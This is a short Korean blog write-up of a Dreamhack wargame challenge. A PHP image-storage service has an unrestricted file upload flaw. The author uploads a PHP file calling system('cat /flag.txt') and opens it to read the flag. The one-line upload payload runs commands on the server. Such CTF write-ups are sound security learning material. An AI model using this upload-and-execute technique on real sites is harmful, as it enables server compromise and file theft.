Stage8 image-storage

2022. 8. 26. 23:30· Dreamhack/Web Hacking
728x90

php로 작성된 파일 저장 서비스에서 파일 업로드 취약점을 이용해서 플래그를 획득하는 문제이다.

Upload 탭에 들어가면 아래와 같은 화면이 뜬다.

flag가 존재하는 /flag.txt 경로로 이동하는 command를 실행하는 php 코드를 작성해서 업로드할 것이다.

cat: 파일 내용 출력

<?php
	system("cat /flag.txt")
?>

파일을 업로드 해주었다.

파일 업로드 후 리스트에 들어가면 업로드한 파일을 확인할 수 있다.

위 파일을 누르면 플래그 확인 가능!!

 

'Dreamhack > Web Hacking' 카테고리의 다른 글

Dreamhack Command Injection-1  (0) 2022.08.13
Stage6  (0) 2022.08.07
Stage5  (0) 2022.07.31
웹 해킹 Stage4  (0) 2022.07.25
SOP(Same Origin Policy)  (0) 2022.07.21
'Dreamhack/Web Hacking' 카테고리의 다른 글
  • Dreamhack Command Injection-1
  • Stage6
  • Stage5
  • 웹 해킹 Stage4
오호츠크해 기단
오호츠크해 기단
공기덩어리오호츠크해 기단 님의 블로그입니다.
오호츠크해 기단
공기덩어리
오호츠크해 기단
전체
오늘
어제
  • 분류 전체보기 (223)
    • Linux (14)
    • Web (20)
    • Forensic (20)
    • Reversing (18)
    • System (28)
    • Fuzzing (4)
    • WHS 1st (12)
    • SWING (5)
    • CTF (37)
    • 활동들.. (24)
      • 개인정보보호 국민점검단 (1)
      • 스쿨혁명 1784 (1)
      • Incognito (10)
      • 코드클럽 (10)
      • 월드프렌즈코리아 ICT봉사단 (2)
    • Dreamhack (16)
      • Web Hacking (10)
      • Crypto (6)
    • 개발 (19)
      • C++ (12)
      • Git (3)
      • Figma (1)
      • Clone (0)

블로그 메뉴

  • 홈
  • 태그
  • 방명록

공지사항

인기 글

태그

  • 코드클럽
  • 깃허브
  • 마크다운
  • readme
  • 월클
  • MD
  • 방
  • github
  • SW교육기부단
  • 마크다운 문법

최근 댓글

최근 글

hELLO · Designed By 정상우.v4.2.0
오호츠크해 기단
Stage8 image-storage
상단으로

티스토리툴바

단축키

내 블로그

내 블로그 - 관리자 홈 전환
Q
Q
새 글 쓰기
W
W

블로그 게시글

글 수정 (권한 있는 경우)
E
E
댓글 영역으로 이동
C
C

모든 영역

이 페이지의 URL 복사
S
S
맨 위로 이동
T
T
티스토리 홈 이동
H
H
단축키 안내
Shift + /
⇧ + /

* 단축키는 한글/영문 대소문자로 이용 가능하며, 티스토리 기본 도메인에서만 동작합니다.